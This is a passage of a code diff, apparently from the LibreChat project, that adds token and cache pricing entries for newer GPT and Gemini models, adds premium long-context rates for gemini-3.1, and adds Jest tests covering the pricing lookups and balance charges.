expect(balance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should charge premium rates for gemini-3.1-pro-preview when prompt tokens exceed threshold', async () => {
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({
|
||||||
|
user: userId,
|
||||||
|
tokenCredits: initialBalance,
|
||||||
|
});
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview';
|
||||||
|
const promptTokens = 250000;
|
||||||
|
const completionTokens = 500;
|
||||||
|
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-premium-pricing',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
await spendTokens(txData, { promptTokens, completionTokens });
|
||||||
|
|
||||||
|
const expectedCost =
|
||||||
|
promptTokens * premiumTokenValues['gemini-3.1'].prompt +
|
||||||
|
completionTokens * premiumTokenValues['gemini-3.1'].completion;
|
||||||
|
|
||||||
|
const balance = await Balance.findOne({ user: userId });
|
||||||
|
expect(balance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should charge premium rates for gemini-3.1-pro-preview-customtools when prompt tokens exceed threshold', async () => {
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({
|
||||||
|
user: userId,
|
||||||
|
tokenCredits: initialBalance,
|
||||||
|
});
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview-customtools';
|
||||||
|
const promptTokens = 250000;
|
||||||
|
const completionTokens = 500;
|
||||||
|
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-customtools-premium',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
await spendTokens(txData, { promptTokens, completionTokens });
|
||||||
|
|
||||||
|
const expectedCost =
|
||||||
|
promptTokens * premiumTokenValues['gemini-3.1'].prompt +
|
||||||
|
completionTokens * premiumTokenValues['gemini-3.1'].completion;
|
||||||
|
|
||||||
|
const balance = await Balance.findOne({ user: userId });
|
||||||
|
expect(balance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should charge premium rates for structured gemini-3.1 tokens when total input exceeds threshold', async () => {
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({
|
||||||
|
user: userId,
|
||||||
|
tokenCredits: initialBalance,
|
||||||
|
});
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview';
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-structured-premium',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
const tokenUsage = {
|
||||||
|
promptTokens: {
|
||||||
|
input: 200000,
|
||||||
|
write: 10000,
|
||||||
|
read: 5000,
|
||||||
|
},
|
||||||
|
completionTokens: 1000,
|
||||||
|
};
|
||||||
|
|
||||||
|
const result = await spendStructuredTokens(txData, tokenUsage);
|
||||||
|
|
||||||
|
const premiumPromptRate = premiumTokenValues['gemini-3.1'].prompt;
|
||||||
|
const premiumCompletionRate = premiumTokenValues['gemini-3.1'].completion;
|
||||||
|
const writeRate = getCacheMultiplier({ model, cacheType: 'write' });
|
||||||
|
const readRate = getCacheMultiplier({ model, cacheType: 'read' });
|
||||||
|
|
||||||
|
const expectedPromptCost =
|
||||||
|
tokenUsage.promptTokens.input * premiumPromptRate +
|
||||||
|
tokenUsage.promptTokens.write * writeRate +
|
||||||
|
tokenUsage.promptTokens.read * readRate;
|
||||||
|
const expectedCompletionCost = tokenUsage.completionTokens * premiumCompletionRate;
|
||||||
|
|
||||||
|
expect(result.prompt.prompt).toBeCloseTo(-expectedPromptCost, 0);
|
||||||
|
expect(result.completion.completion).toBeCloseTo(-expectedCompletionCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
it('should not apply premium pricing to non-premium models regardless of prompt size', async () => {
|
it('should not apply premium pricing to non-premium models regardless of prompt size', async () => {
|
||||||
const initialBalance = 100000000;
|
const initialBalance = 100000000;
|
||||||
await Balance.create({
|
await Balance.create({
|
||||||
|
|
|
||||||
|
|
@ -4,31 +4,18 @@ const defaultRate = 6;
|
||||||
/**
|
/**
|
||||||
* Token Pricing Configuration
|
* Token Pricing Configuration
|
||||||
*
|
*
|
||||||
* IMPORTANT: Key Ordering for Pattern Matching
|
* Pattern Matching
|
||||||
* ============================================
|
* ================
|
||||||
* The `findMatchingPattern` function iterates through object keys in REVERSE order
|
* `findMatchingPattern` (from @librechat/api) uses `modelName.includes(key)` and selects
|
||||||
* (last-defined keys are checked first) and uses `modelName.includes(key)` for matching.
|
* the LONGEST matching key. If a key's length equals the model name's length (exact match),
|
||||||
|
* it returns immediately. Definition order does NOT affect correctness.
|
||||||
*
|
*
|
||||||
* This means:
|
* Key ordering matters only for:
|
||||||
* 1. BASE PATTERNS must be defined FIRST (e.g., "kimi", "moonshot")
|
* 1. Performance: list older/less common models first so newer/common models
|
||||||
* 2. SPECIFIC PATTERNS must be defined AFTER their base patterns (e.g., "kimi-k2", "kimi-k2.5")
|
* are found earlier in the reverse scan.
|
||||||
*
|
* 2. Same-length tie-breaking: the last-defined key wins on equal-length matches.
|
||||||
* Example ordering for Kimi models:
|
|
||||||
* kimi: { prompt: 0.6, completion: 2.5 }, // Base pattern - checked last
|
|
||||||
* 'kimi-k2': { prompt: 0.6, completion: 2.5 }, // More specific - checked before "kimi"
|
|
||||||
* 'kimi-k2.5': { prompt: 0.6, completion: 3.0 }, // Most specific - checked first
|
|
||||||
*
|
|
||||||
* Why this matters:
|
|
||||||
* - Model name "kimi-k2.5" contains both "kimi" and "kimi-k2" as substrings
|
|
||||||
* - If "kimi" were checked first, it would incorrectly match and return wrong pricing
|
|
||||||
* - By defining specific patterns AFTER base patterns, they're checked first in reverse iteration
|
|
||||||
*
|
*
|
||||||
* This applies to BOTH `tokenValues` and `cacheTokenValues` objects.
|
* This applies to BOTH `tokenValues` and `cacheTokenValues` objects.
|
||||||
*
|
|
||||||
* When adding new model families:
|
|
||||||
* 1. Define the base/generic pattern first
|
|
||||||
* 2. Define increasingly specific patterns after
|
|
||||||
* 3. Ensure no pattern is a substring of another that should match differently
|
|
||||||
*/
|
*/
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
@ -150,9 +137,14 @@ const tokenValues = Object.assign(
|
||||||
'gpt-5': { prompt: 1.25, completion: 10 },
|
'gpt-5': { prompt: 1.25, completion: 10 },
|
||||||
'gpt-5.1': { prompt: 1.25, completion: 10 },
|
'gpt-5.1': { prompt: 1.25, completion: 10 },
|
||||||
'gpt-5.2': { prompt: 1.75, completion: 14 },
|
'gpt-5.2': { prompt: 1.75, completion: 14 },
|
||||||
|
'gpt-5.3': { prompt: 1.75, completion: 14 },
|
||||||
|
'gpt-5.4': { prompt: 2.5, completion: 15 },
|
||||||
|
// TODO: gpt-5.4-pro pricing not yet officially published — verify before release
|
||||||
|
'gpt-5.4-pro': { prompt: 5, completion: 30 },
|
||||||
'gpt-5-nano': { prompt: 0.05, completion: 0.4 },
|
'gpt-5-nano': { prompt: 0.05, completion: 0.4 },
|
||||||
'gpt-5-mini': { prompt: 0.25, completion: 2 },
|
'gpt-5-mini': { prompt: 0.25, completion: 2 },
|
||||||
'gpt-5-pro': { prompt: 15, completion: 120 },
|
'gpt-5-pro': { prompt: 15, completion: 120 },
|
||||||
|
'gpt-5.2-pro': { prompt: 21, completion: 168 },
|
||||||
o1: { prompt: 15, completion: 60 },
|
o1: { prompt: 15, completion: 60 },
|
||||||
'o1-mini': { prompt: 1.1, completion: 4.4 },
|
'o1-mini': { prompt: 1.1, completion: 4.4 },
|
||||||
'o1-preview': { prompt: 15, completion: 60 },
|
'o1-preview': { prompt: 15, completion: 60 },
|
||||||
|
|
@ -200,6 +192,8 @@ const tokenValues = Object.assign(
|
||||||
'gemini-2.5-flash-image': { prompt: 0.15, completion: 30 },
|
'gemini-2.5-flash-image': { prompt: 0.15, completion: 30 },
|
||||||
'gemini-3': { prompt: 2, completion: 12 },
|
'gemini-3': { prompt: 2, completion: 12 },
|
||||||
'gemini-3-pro-image': { prompt: 2, completion: 120 },
|
'gemini-3-pro-image': { prompt: 2, completion: 120 },
|
||||||
|
'gemini-3.1': { prompt: 2, completion: 12 },
|
||||||
|
'gemini-3.1-flash-lite': { prompt: 0.25, completion: 1.5 },
|
||||||
'gemini-pro-vision': { prompt: 0.5, completion: 1.5 },
|
'gemini-pro-vision': { prompt: 0.5, completion: 1.5 },
|
||||||
grok: { prompt: 2.0, completion: 10.0 }, // Base pattern defaults to grok-2
|
grok: { prompt: 2.0, completion: 10.0 }, // Base pattern defaults to grok-2
|
||||||
'grok-beta': { prompt: 5.0, completion: 15.0 },
|
'grok-beta': { prompt: 5.0, completion: 15.0 },
|
||||||
|
|
@ -314,6 +308,29 @@ const cacheTokenValues = {
|
||||||
'claude-opus-4': { write: 18.75, read: 1.5 },
|
'claude-opus-4': { write: 18.75, read: 1.5 },
|
||||||
'claude-opus-4-5': { write: 6.25, read: 0.5 },
|
'claude-opus-4-5': { write: 6.25, read: 0.5 },
|
||||||
'claude-opus-4-6': { write: 6.25, read: 0.5 },
|
'claude-opus-4-6': { write: 6.25, read: 0.5 },
|
||||||
|
// OpenAI models — cached input discount varies by family:
|
||||||
|
// gpt-4o (incl. mini), o1 (incl. mini/preview): 50% off
|
||||||
|
// gpt-4.1 (incl. mini/nano), o3 (incl. mini), o4-mini: 75% off
|
||||||
|
// gpt-5.x (excl. pro variants): 90% off
|
||||||
|
// gpt-5-pro, gpt-5.2-pro, gpt-5.4-pro: no caching
|
||||||
|
'gpt-4o': { write: 2.5, read: 1.25 },
|
||||||
|
'gpt-4o-mini': { write: 0.15, read: 0.075 },
|
||||||
|
'gpt-4.1': { write: 2, read: 0.5 },
|
||||||
|
'gpt-4.1-mini': { write: 0.4, read: 0.1 },
|
||||||
|
'gpt-4.1-nano': { write: 0.1, read: 0.025 },
|
||||||
|
'gpt-5': { write: 1.25, read: 0.125 },
|
||||||
|
'gpt-5.1': { write: 1.25, read: 0.125 },
|
||||||
|
'gpt-5.2': { write: 1.75, read: 0.175 },
|
||||||
|
'gpt-5.3': { write: 1.75, read: 0.175 },
|
||||||
|
'gpt-5.4': { write: 2.5, read: 0.25 },
|
||||||
|
'gpt-5-mini': { write: 0.25, read: 0.025 },
|
||||||
|
'gpt-5-nano': { write: 0.05, read: 0.005 },
|
||||||
|
o1: { write: 15, read: 7.5 },
|
||||||
|
'o1-mini': { write: 1.1, read: 0.55 },
|
||||||
|
'o1-preview': { write: 15, read: 7.5 },
|
||||||
|
o3: { write: 2, read: 0.5 },
|
||||||
|
'o3-mini': { write: 1.1, read: 0.275 },
|
||||||
|
'o4-mini': { write: 1.1, read: 0.275 },
|
||||||
// DeepSeek models - cache hit: $0.028/1M, cache miss: $0.28/1M
|
// DeepSeek models - cache hit: $0.028/1M, cache miss: $0.28/1M
|
||||||
deepseek: { write: 0.28, read: 0.028 },
|
deepseek: { write: 0.28, read: 0.028 },
|
||||||
'deepseek-chat': { write: 0.28, read: 0.028 },
|
'deepseek-chat': { write: 0.28, read: 0.028 },
|
||||||
|
|
@ -330,6 +347,10 @@ const cacheTokenValues = {
|
||||||
'kimi-k2-0711-preview': { write: 0.6, read: 0.15 },
|
'kimi-k2-0711-preview': { write: 0.6, read: 0.15 },
|
||||||
'kimi-k2-thinking': { write: 0.6, read: 0.15 },
|
'kimi-k2-thinking': { write: 0.6, read: 0.15 },
|
||||||
'kimi-k2-thinking-turbo': { write: 1.15, read: 0.15 },
|
'kimi-k2-thinking-turbo': { write: 1.15, read: 0.15 },
|
||||||
|
// Gemini 3.1 Pro - cache write: $2.00/1M, cache read: $0.20/1M
|
||||||
|
'gemini-3.1': { write: 2, read: 0.2 },
|
||||||
|
// Gemini 3.1 Flash-Lite - cache write: $0.25/1M, cache read: $0.025/1M
|
||||||
|
'gemini-3.1-flash-lite': { write: 0.25, read: 0.025 },
|
||||||
};
|
};
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
@ -340,6 +361,7 @@ const cacheTokenValues = {
|
||||||
const premiumTokenValues = {
|
const premiumTokenValues = {
|
||||||
'claude-opus-4-6': { threshold: 200000, prompt: 10, completion: 37.5 },
|
'claude-opus-4-6': { threshold: 200000, prompt: 10, completion: 37.5 },
|
||||||
'claude-sonnet-4-6': { threshold: 200000, prompt: 6, completion: 22.5 },
|
'claude-sonnet-4-6': { threshold: 200000, prompt: 6, completion: 22.5 },
|
||||||
|
'gemini-3.1': { threshold: 200000, prompt: 4, completion: 18 },
|
||||||
};
|
};
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
|
||||||
|
|
@ -52,6 +52,24 @@ describe('getValueKey', () => {
|
||||||
expect(getValueKey('openai/gpt-5.2')).toBe('gpt-5.2');
|
expect(getValueKey('openai/gpt-5.2')).toBe('gpt-5.2');
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should return "gpt-5.3" for model name containing "gpt-5.3"', () => {
|
||||||
|
expect(getValueKey('gpt-5.3')).toBe('gpt-5.3');
|
||||||
|
expect(getValueKey('gpt-5.3-chat-latest')).toBe('gpt-5.3');
|
||||||
|
expect(getValueKey('gpt-5.3-codex')).toBe('gpt-5.3');
|
||||||
|
expect(getValueKey('openai/gpt-5.3')).toBe('gpt-5.3');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return "gpt-5.4" for model name containing "gpt-5.4"', () => {
|
||||||
|
expect(getValueKey('gpt-5.4')).toBe('gpt-5.4');
|
||||||
|
expect(getValueKey('gpt-5.4-thinking')).toBe('gpt-5.4');
|
||||||
|
expect(getValueKey('openai/gpt-5.4')).toBe('gpt-5.4');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return "gpt-5.4-pro" for model name containing "gpt-5.4-pro"', () => {
|
||||||
|
expect(getValueKey('gpt-5.4-pro')).toBe('gpt-5.4-pro');
|
||||||
|
expect(getValueKey('openai/gpt-5.4-pro')).toBe('gpt-5.4-pro');
|
||||||
|
});
|
||||||
|
|
||||||
it('should return "gpt-3.5-turbo-1106" for model name containing "gpt-3.5-turbo-1106"', () => {
|
it('should return "gpt-3.5-turbo-1106" for model name containing "gpt-3.5-turbo-1106"', () => {
|
||||||
expect(getValueKey('gpt-3.5-turbo-1106-some-other-info')).toBe('gpt-3.5-turbo-1106');
|
expect(getValueKey('gpt-3.5-turbo-1106-some-other-info')).toBe('gpt-3.5-turbo-1106');
|
||||||
expect(getValueKey('openai/gpt-3.5-turbo-1106')).toBe('gpt-3.5-turbo-1106');
|
expect(getValueKey('openai/gpt-3.5-turbo-1106')).toBe('gpt-3.5-turbo-1106');
|
||||||
|
|
@ -138,6 +156,12 @@ describe('getValueKey', () => {
|
||||||
expect(getValueKey('gpt-5-pro-preview')).toBe('gpt-5-pro');
|
expect(getValueKey('gpt-5-pro-preview')).toBe('gpt-5-pro');
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should return "gpt-5.2-pro" for model name containing "gpt-5.2-pro"', () => {
|
||||||
|
expect(getValueKey('gpt-5.2-pro')).toBe('gpt-5.2-pro');
|
||||||
|
expect(getValueKey('gpt-5.2-pro-2025-03-01')).toBe('gpt-5.2-pro');
|
||||||
|
expect(getValueKey('openai/gpt-5.2-pro')).toBe('gpt-5.2-pro');
|
||||||
|
});
|
||||||
|
|
||||||
it('should return "gpt-4o" for model type of "gpt-4o"', () => {
|
it('should return "gpt-4o" for model type of "gpt-4o"', () => {
|
||||||
expect(getValueKey('gpt-4o-2024-08-06')).toBe('gpt-4o');
|
expect(getValueKey('gpt-4o-2024-08-06')).toBe('gpt-4o');
|
||||||
expect(getValueKey('gpt-4o-2024-08-06-0718')).toBe('gpt-4o');
|
expect(getValueKey('gpt-4o-2024-08-06-0718')).toBe('gpt-4o');
|
||||||
|
|
@ -336,6 +360,18 @@ describe('getMultiplier', () => {
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should return the correct multiplier for gpt-5.2-pro', () => {
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.2-pro', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.2-pro'].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.2-pro', tokenType: 'completion' })).toBe(
|
||||||
|
tokenValues['gpt-5.2-pro'].completion,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'openai/gpt-5.2-pro', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.2-pro'].prompt,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
it('should return the correct multiplier for gpt-5.1', () => {
|
it('should return the correct multiplier for gpt-5.1', () => {
|
||||||
expect(getMultiplier({ model: 'gpt-5.1', tokenType: 'prompt' })).toBe(
|
expect(getMultiplier({ model: 'gpt-5.1', tokenType: 'prompt' })).toBe(
|
||||||
tokenValues['gpt-5.1'].prompt,
|
tokenValues['gpt-5.1'].prompt,
|
||||||
|
|
@ -360,6 +396,48 @@ describe('getMultiplier', () => {
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should return the correct multiplier for gpt-5.3', () => {
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.3', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.3'].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.3', tokenType: 'completion' })).toBe(
|
||||||
|
tokenValues['gpt-5.3'].completion,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.3-codex', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.3'].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'openai/gpt-5.3', tokenType: 'completion' })).toBe(
|
||||||
|
tokenValues['gpt-5.3'].completion,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return the correct multiplier for gpt-5.4', () => {
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.4', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.4'].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.4', tokenType: 'completion' })).toBe(
|
||||||
|
tokenValues['gpt-5.4'].completion,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.4-thinking', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.4'].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'openai/gpt-5.4', tokenType: 'completion' })).toBe(
|
||||||
|
tokenValues['gpt-5.4'].completion,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return the correct multiplier for gpt-5.4-pro', () => {
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.4-pro', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.4-pro'].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'gpt-5.4-pro', tokenType: 'completion' })).toBe(
|
||||||
|
tokenValues['gpt-5.4-pro'].completion,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model: 'openai/gpt-5.4-pro', tokenType: 'prompt' })).toBe(
|
||||||
|
tokenValues['gpt-5.4-pro'].prompt,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
it('should return the correct multiplier for gpt-4o', () => {
|
it('should return the correct multiplier for gpt-4o', () => {
|
||||||
const valueKey = getValueKey('gpt-4o-2024-08-06');
|
const valueKey = getValueKey('gpt-4o-2024-08-06');
|
||||||
expect(getMultiplier({ valueKey, tokenType: 'prompt' })).toBe(tokenValues['gpt-4o'].prompt);
|
expect(getMultiplier({ valueKey, tokenType: 'prompt' })).toBe(tokenValues['gpt-4o'].prompt);
|
||||||
|
|
@ -1326,6 +1404,73 @@ describe('getCacheMultiplier', () => {
|
||||||
).toBeNull();
|
).toBeNull();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should return correct cache multipliers for OpenAI models', () => {
|
||||||
|
const openaiCacheModels = [
|
||||||
|
'gpt-4o',
|
||||||
|
'gpt-4o-mini',
|
||||||
|
'gpt-4.1',
|
||||||
|
'gpt-4.1-mini',
|
||||||
|
'gpt-4.1-nano',
|
||||||
|
'gpt-5',
|
||||||
|
'gpt-5.1',
|
||||||
|
'gpt-5.2',
|
||||||
|
'gpt-5.3',
|
||||||
|
'gpt-5.4',
|
||||||
|
'gpt-5-mini',
|
||||||
|
'gpt-5-nano',
|
||||||
|
'o1',
|
||||||
|
'o1-mini',
|
||||||
|
'o1-preview',
|
||||||
|
'o3',
|
||||||
|
'o3-mini',
|
||||||
|
'o4-mini',
|
||||||
|
];
|
||||||
|
|
||||||
|
for (const model of openaiCacheModels) {
|
||||||
|
expect(getCacheMultiplier({ model, cacheType: 'write' })).toBe(cacheTokenValues[model].write);
|
||||||
|
expect(getCacheMultiplier({ model, cacheType: 'read' })).toBe(cacheTokenValues[model].read);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return correct cache multipliers for OpenAI dated variants', () => {
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-4o-2024-08-06', cacheType: 'read' })).toBe(
|
||||||
|
cacheTokenValues['gpt-4o'].read,
|
||||||
|
);
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-4.1-2026-01-01', cacheType: 'read' })).toBe(
|
||||||
|
cacheTokenValues['gpt-4.1'].read,
|
||||||
|
);
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-5.3-codex', cacheType: 'read' })).toBe(
|
||||||
|
cacheTokenValues['gpt-5.3'].read,
|
||||||
|
);
|
||||||
|
expect(getCacheMultiplier({ model: 'openai/gpt-5.3', cacheType: 'write' })).toBe(
|
||||||
|
cacheTokenValues['gpt-5.3'].write,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return null for pro models that do not support caching', () => {
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-5-pro', cacheType: 'read' })).toBeNull();
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-5-pro', cacheType: 'write' })).toBeNull();
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-5.2-pro', cacheType: 'read' })).toBeNull();
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-5.2-pro', cacheType: 'write' })).toBeNull();
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-5.4-pro', cacheType: 'read' })).toBeNull();
|
||||||
|
expect(getCacheMultiplier({ model: 'gpt-5.4-pro', cacheType: 'write' })).toBeNull();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should have consistent 10% cache read pricing for gpt-5.x models', () => {
|
||||||
|
const gpt5CacheModels = [
|
||||||
|
'gpt-5',
|
||||||
|
'gpt-5.1',
|
||||||
|
'gpt-5.2',
|
||||||
|
'gpt-5.3',
|
||||||
|
'gpt-5.4',
|
||||||
|
'gpt-5-mini',
|
||||||
|
'gpt-5-nano',
|
||||||
|
];
|
||||||
|
for (const model of gpt5CacheModels) {
|
||||||
|
expect(cacheTokenValues[model].read).toBeCloseTo(cacheTokenValues[model].write * 0.1, 10);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
it('should handle models with "bedrock/" prefix', () => {
|
it('should handle models with "bedrock/" prefix', () => {
|
||||||
expect(
|
expect(
|
||||||
getCacheMultiplier({
|
getCacheMultiplier({
|
||||||
|
|
@ -1345,6 +1490,9 @@ describe('getCacheMultiplier', () => {
|
||||||
describe('Google Model Tests', () => {
|
describe('Google Model Tests', () => {
|
||||||
const googleModels = [
|
const googleModels = [
|
||||||
'gemini-3',
|
'gemini-3',
|
||||||
|
'gemini-3.1-pro-preview',
|
||||||
|
'gemini-3.1-pro-preview-customtools',
|
||||||
|
'gemini-3.1-flash-lite-preview',
|
||||||
'gemini-2.5-pro',
|
'gemini-2.5-pro',
|
||||||
'gemini-2.5-flash',
|
'gemini-2.5-flash',
|
||||||
'gemini-2.5-flash-lite',
|
'gemini-2.5-flash-lite',
|
||||||
|
|
@ -1389,6 +1537,9 @@ describe('Google Model Tests', () => {
|
||||||
it('should map to the correct model keys', () => {
|
it('should map to the correct model keys', () => {
|
||||||
const expected = {
|
const expected = {
|
||||||
'gemini-3': 'gemini-3',
|
'gemini-3': 'gemini-3',
|
||||||
|
'gemini-3.1-pro-preview': 'gemini-3.1',
|
||||||
|
'gemini-3.1-pro-preview-customtools': 'gemini-3.1',
|
||||||
|
'gemini-3.1-flash-lite-preview': 'gemini-3.1-flash-lite',
|
||||||
'gemini-2.5-pro': 'gemini-2.5-pro',
|
'gemini-2.5-pro': 'gemini-2.5-pro',
|
||||||
'gemini-2.5-flash': 'gemini-2.5-flash',
|
'gemini-2.5-flash': 'gemini-2.5-flash',
|
||||||
'gemini-2.5-flash-lite': 'gemini-2.5-flash-lite',
|
'gemini-2.5-flash-lite': 'gemini-2.5-flash-lite',
|
||||||
|
|
@ -1432,6 +1583,190 @@ describe('Google Model Tests', () => {
|
||||||
).toBe(tokenValues[expected].completion);
|
).toBe(tokenValues[expected].completion);
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should return correct prompt and completion rates for Gemini 3.1', () => {
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview',
|
||||||
|
tokenType: 'prompt',
|
||||||
|
endpoint: EModelEndpoint.google,
|
||||||
|
}),
|
||||||
|
).toBe(tokenValues['gemini-3.1'].prompt);
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview',
|
||||||
|
tokenType: 'completion',
|
||||||
|
endpoint: EModelEndpoint.google,
|
||||||
|
}),
|
||||||
|
).toBe(tokenValues['gemini-3.1'].completion);
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview-customtools',
|
||||||
|
tokenType: 'prompt',
|
||||||
|
endpoint: EModelEndpoint.google,
|
||||||
|
}),
|
||||||
|
).toBe(tokenValues['gemini-3.1'].prompt);
|
||||||
|
expect(
|
||||||
|
getMultiplier({
|
||||||
|
model: 'gemini-3.1-pro-preview-customtools',
|
||||||
|
tokenType: 'completion',
|
||||||
|
endpoint: EModelEndpoint.google,
|
||||||
|
}),
|
||||||
|
).toBe(tokenValues['gemini-3.1'].completion);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return correct cache rates for Gemini 3.1', () => {
|
||||||
|
['gemini-3.1-pro-preview', 'gemini-3.1-pro-preview-customtools'].forEach((model) => {
|
||||||
|
expect(getCacheMultiplier({ model, cacheType: 'write' })).toBe(
|
||||||
|
cacheTokenValues['gemini-3.1'].write,
|
||||||
|
);
|
||||||
|
expect(getCacheMultiplier({ model, cacheType: 'read' })).toBe(
|
||||||
|
cacheTokenValues['gemini-3.1'].read,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return correct rates for Gemini 3.1 Flash-Lite', () => {
|
||||||
|
const model = 'gemini-3.1-flash-lite-preview';
|
||||||
|
expect(getMultiplier({ model, tokenType: 'prompt', endpoint: EModelEndpoint.google })).toBe(
|
||||||
|
tokenValues['gemini-3.1-flash-lite'].prompt,
|
||||||
|
);
|
||||||
|
expect(getMultiplier({ model, tokenType: 'completion', endpoint: EModelEndpoint.google })).toBe(
|
||||||
|
tokenValues['gemini-3.1-flash-lite'].completion,
|
||||||
|
);
|
||||||
|
expect(getCacheMultiplier({ model, cacheType: 'write' })).toBe(
|
||||||
|
cacheTokenValues['gemini-3.1-flash-lite'].write,
|
||||||
|
);
|
||||||
|
expect(getCacheMultiplier({ model, cacheType: 'read' })).toBe(
|
||||||
|
cacheTokenValues['gemini-3.1-flash-lite'].read,
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('Gemini 3.1 Premium Token Pricing', () => {
|
||||||
|
const premiumKey = 'gemini-3.1';
|
||||||
|
const premiumEntry = premiumTokenValues[premiumKey];
|
||||||
|
const { threshold } = premiumEntry;
|
||||||
|
const belowThreshold = threshold - 1;
|
||||||
|
const aboveThreshold = threshold + 1;
|
||||||
|
const wellAboveThreshold = threshold * 2;
|
||||||
|
|
||||||
|
it('should have premium pricing defined for gemini-3.1', () => {
|
||||||
|
expect(premiumEntry).toBeDefined();
|
||||||
|
expect(premiumEntry.threshold).toBeDefined();
|
||||||
|
expect(premiumEntry.prompt).toBeDefined();
|
||||||
|
expect(premiumEntry.completion).toBeDefined();
|
||||||
|
expect(premiumEntry.prompt).toBeGreaterThan(tokenValues[premiumKey].prompt);
|
||||||
|
expect(premiumEntry.completion).toBeGreaterThan(tokenValues[premiumKey].completion);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return null from getPremiumRate when inputTokenCount is below or at threshold', () => {
|
||||||
|
expect(getPremiumRate(premiumKey, 'prompt', belowThreshold)).toBeNull();
|
||||||
|
expect(getPremiumRate(premiumKey, 'completion', belowThreshold)).toBeNull();
|
||||||
|
expect(getPremiumRate(premiumKey, 'prompt', threshold)).toBeNull();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return premium rate from getPremiumRate when inputTokenCount exceeds threshold', () => {
|
||||||
|
